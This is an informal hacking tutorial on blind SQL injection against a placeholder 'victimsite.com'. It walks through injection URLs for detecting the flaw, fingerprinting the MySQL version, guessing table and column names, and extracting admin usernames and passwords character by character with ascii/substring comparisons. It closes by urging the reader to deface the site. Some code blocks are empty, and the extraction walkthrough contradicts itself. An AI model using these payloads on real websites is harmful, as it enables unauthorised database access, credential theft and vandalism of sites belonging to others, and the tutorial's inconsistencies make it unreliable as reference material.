Advanced SQL Injection Part:2 Blind SQLi
Hellow everyone, tonight i'm gonna teach you another method of SQL Injection called Blind SQLi. Blind SQLi is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
Note that this is not a tutorial for noobs. If you don't know much about SQLi then learn it from my previous tutorial.
So here we go...
Step 1:
test for vulnerability so you have a site lets say :
Code:
just like normal mysql injection
but for blind you put
Code:
if you see any text from the page missing or an error message like invalid id or db_error select * from xxxx@localhost call line "/" or anything like that then its vuln
this works because 1=2 is always false you see if it was
Code:
then you would get the normal page because 1=1 is always true
Step 2:
mysql version to find mysql version you need to do this query
Code:
www.victimsite.com/index.php?id=1 and substring(@@version,1,1)=4
if the pages comes back true then the version is 4 if not then try
Code:
www.victimsite.com/index.php?id=1 and substring(@@version,1,1)=5
if it comes back true then its a version 5
Step 3:
fuzzing tables and columns to find the table name you need to guess it so... here is the query
Code:
www.victimsite.com/index.php?id=1 and (SELECT 1 from admin limit 0,1)=1
i have guessed the table admin if the page loads true then the table exists eg. the table name is administrator and we try
Code:
(SELECT 1 from users limit 0,1)=1
then it will return with an error a.k.a. false but if we did
Code:
(SELECT 1 from administrator limit 0,1)=1
then it would not error a.k.a. true
now for the column so the table is administrator and we found that by fuzzing now we need the column name we fuzz it by
Code:
www.victimsite.com/index.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1
if the column password exists then it wont error you get my drift...
Step 4:
extracting password with ascii so now we have the table/column we need to extract well as you know it wont just pop up on the screen we will need to use the ancii char
Code:
www.victimsite.com/index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99
if this returns true then you need to go higher
Code:
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
if this errors then its not greater than 103 and greater than/or 99 now try
Code:
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from
users where userid=2),1,1))>100
no error then its greater than 99 and not greater than 103 higher
Code:
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>101
error so its greater than 99 but not greater than 101 higher
Code:
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
error so its greater than 99 but not greater than 100 making it 100 the first character of the password is 100 which if u put into an ascii converter you will see that it is the letter d now you need to find the next character
Code:
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>60
notice how i did where userid=1),2,1))>60 instead of 1,1 so this will be doing the second character so keep extracting characters until u get an error then u will have the hash / password
now you've got user password. find the admin panel and deface the site just like before.
Happy Hacking :)